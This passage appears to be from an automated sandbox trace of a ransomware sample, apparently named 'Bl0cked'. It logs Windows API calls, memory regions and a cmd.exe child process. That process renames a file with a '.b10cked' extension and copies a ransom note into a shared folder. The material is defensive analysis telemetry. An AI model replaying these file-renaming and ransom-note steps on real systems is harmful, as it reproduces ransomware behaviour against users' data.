_String2="..") returned 51 [0150.929] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl")) returned 0x20 [0150.929] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.929] SetErrorMode (uMode=0x0) returned 0x0 [0150.929] SetErrorMode (uMode=0x1) returned 0x0 [0150.929] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", nBufferLength=0x104, lpBuffer=0x2eed34, lpFilePart=0x2eed1c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", lpFilePart=0x2eed1c*="Active.GRL") returned 0x28 [0150.929] SetErrorMode (uMode=0x0) returned 0x1 [0150.929] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF" (normalized: "c:\\users\\alluse~1\\micros~1\\mf")) returned 0x2010 [0150.930] _wcsicmp (_String1="Active.GRL", _String2=".") returned 51 [0150.930] _wcsicmp (_String1="Active.GRL", _String2="..") returned 51 [0150.930] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl")) returned 0x20 [0150.930] SetErrorMode (uMode=0x0) returned 0x0 [0150.930] SetErrorMode (uMode=0x1) returned 0x0 [0150.930] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", nBufferLength=0x104, lpBuffer=0x2ef1b0, lpFilePart=0x2eef48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", lpFilePart=0x2eef48*="Active.GRL") returned 0x28 [0150.930] SetErrorMode (uMode=0x0) returned 0x1 [0150.930] SetErrorMode (uMode=0x0) returned 0x0 [0150.930] SetErrorMode (uMode=0x1) returned 0x0 [0150.930] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x2ef3b8, lpFilePart=0x2eef48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", lpFilePart=0x2eef48*="Active.GRL.b10cked") returned 0x30 [0150.930] SetErrorMode (uMode=0x0) returned 0x1 [0150.930] SetLastError (dwErrCode=0x0) [0150.930] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl.b10cked")) returned 0xffffffff [0150.930] GetLastError () returned 0x2 [0150.930] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", fInfoLevelId=0x1, lpFindFileData=0x2ee8c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee8c4) returned 0x3d0f08 [0150.931] FindNextFileW (in: hFindFile=0x3d0f08, lpFindFileData=0x2ee8c4 | out: lpFindFileData=0x2ee8c4) returned 0 [0150.931] GetLastError () returned 0x12 [0150.931] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0150.932] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", fInfoLevelId=0x1, lpFindFileData=0x3e1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1ae0) returned 0x3d0f08 [0150.933] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x2eeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked", lpFilePart=0x0) returned 0x30 [0150.933] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", nBufferLength=0x104, lpBuffer=0x2eeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL", lpFilePart=0x0) returned 0x28 [0150.933] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl")) returned 0x20 [0150.933] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\active.grl.b10cked"), dwFlags=0x3) returned 1 [0150.933] FindClose (in: hFindFile=0x3d0f08 | out: hFindFile=0x3d0f08) returned 1 [0150.933] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eeb10 | out: _Buffer=" 1") returned 9 [0150.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.934] GetFileType (hFile=0x7) returned 0x2 [0150.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0150.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea9c | out: lpMode=0x2eea9c) returned 1 [0150.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.934] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eead0 | out: lpConsoleScreenBufferInfo=0x2eead0) returned 1 [0150.934] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0150.935] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eeb10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0150.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eeaf4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eeaf4*=0x1a) returned 1 [0150.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.935] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.935] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.936] SetConsoleInputExeNameW () returned 0x1 [0150.936] GetConsoleOutputCP () returned 0x1b5 [0150.936] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.936] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.936] exit (_Code=0) Process: id = "239" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xc3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19756 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19757 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 19758 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 19759 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 19760 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19761 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19762 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19763 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19764 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 19765 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19781 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19782 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19783 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19784 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 19785 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 19786 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19787 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19788 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19789 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19790 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19791 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19792 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19793 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19794 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19795 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 19796 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19797 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19798 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 19799 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 19800 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 19801 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 19802 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 19803 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 19804 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 302 os_tid = 0xd00 [0150.738] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff4c | out: lpSystemTimeAsFileTime=0x12ff4c*(dwLowDateTime=0x93c8bce0, dwHighDateTime=0x1d440a9)) [0150.738] GetCurrentProcessId () returned 0xc3c [0150.738] GetCurrentThreadId () returned 0xd00 [0150.738] GetTickCount () returned 0x2e9c2 [0150.738] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff44 | out: lpPerformanceCount=0x12ff44*=20752697832) returned 1 [0150.739] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.739] __set_app_type (_Type=0x1) [0150.739] __p__fmode () returned 0x76b331f4 [0150.739] __p__commode () returned 0x76b331fc [0150.739] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.739] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.739] GetCurrentThreadId () returned 0xd00 [0150.739] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd00) returned 0x38 [0150.739] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.739] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.740] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.740] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fedc | out: phkResult=0x12fedc*=0x0) returned 0x2 [0150.740] VirtualQuery (in: lpAddress=0x12ff13, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.740] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12feac, dwLength=0x1c | out: lpBuffer=0x12feac*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0150.740] GetConsoleOutputCP () returned 0x1b5 [0150.740] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.740] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.740] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.740] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.741] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.741] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.741] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.741] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.741] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.742] GetEnvironmentStringsW () returned 0x280178* [0150.742] FreeEnvironmentStringsW (penv=0x280178) returned 1 [0150.742] GetEnvironmentStringsW () returned 0x280178* [0150.742] FreeEnvironmentStringsW (penv=0x280178) returned 1 [0150.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee4c | out: phkResult=0x12ee4c*=0x40) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0xa0, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x0, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.742] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegCloseKey (hKey=0x40) returned 0x0 [0150.743] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee4c | out: phkResult=0x12ee4c*=0x40) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x40, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x1, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x0, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x9, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x4, lpData=0x12ee58*=0x9, lpcbData=0x12ee50*=0x4) returned 0x0 [0150.743] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee54, lpData=0x12ee58, lpcbData=0x12ee50*=0x1000 | out: lpType=0x12ee54*=0x0, lpData=0x12ee58*=0x9, lpcbData=0x12ee50*=0x1000) returned 0x2 [0150.743] RegCloseKey (hKey=0x40) returned 0x0 [0150.743] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886379 [0150.743] srand (_Seed=0x5b886379) [0150.743] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"" [0150.743] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Bl0cked-ReadMe.rtf\"" [0150.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.744] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2818d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.744] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.744] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.744] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.744] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.744] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.744] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.744] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.744] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.744] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.744] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.744] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.744] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.745] GetEnvironmentStringsW () returned 0x2822c8* [0150.745] FreeEnvironmentStringsW (penv=0x2822c8) returned 1 [0150.745] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.745] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.745] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.745] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.745] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.745] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.745] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.745] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.745] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.745] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.745] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fc18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.745] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fc18, lpFilePart=0x12fc14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fc14*="Desktop") returned 0x18 [0150.745] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.745] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f994 | out: lpFindFileData=0x12f994) returned 0x280008 [0150.746] FindClose (in: hFindFile=0x280008 | out: hFindFile=0x280008) returned 1 [0150.746] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f994 | out: lpFindFileData=0x12f994) returned 0x280008 [0150.746] FindClose (in: hFindFile=0x280008 | out: hFindFile=0x280008) returned 1 [0150.746] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f994 | out: lpFindFileData=0x12f994) returned 0x280008 [0150.746] FindClose (in: hFindFile=0x280008 | out: hFindFile=0x280008) returned 1 [0150.746] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.746] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.746] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.746] GetEnvironmentStringsW () returned 0x282ae8* [0150.747] FreeEnvironmentStringsW (penv=0x282ae8) returned 1 [0150.747] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.747] GetConsoleOutputCP () returned 0x1b5 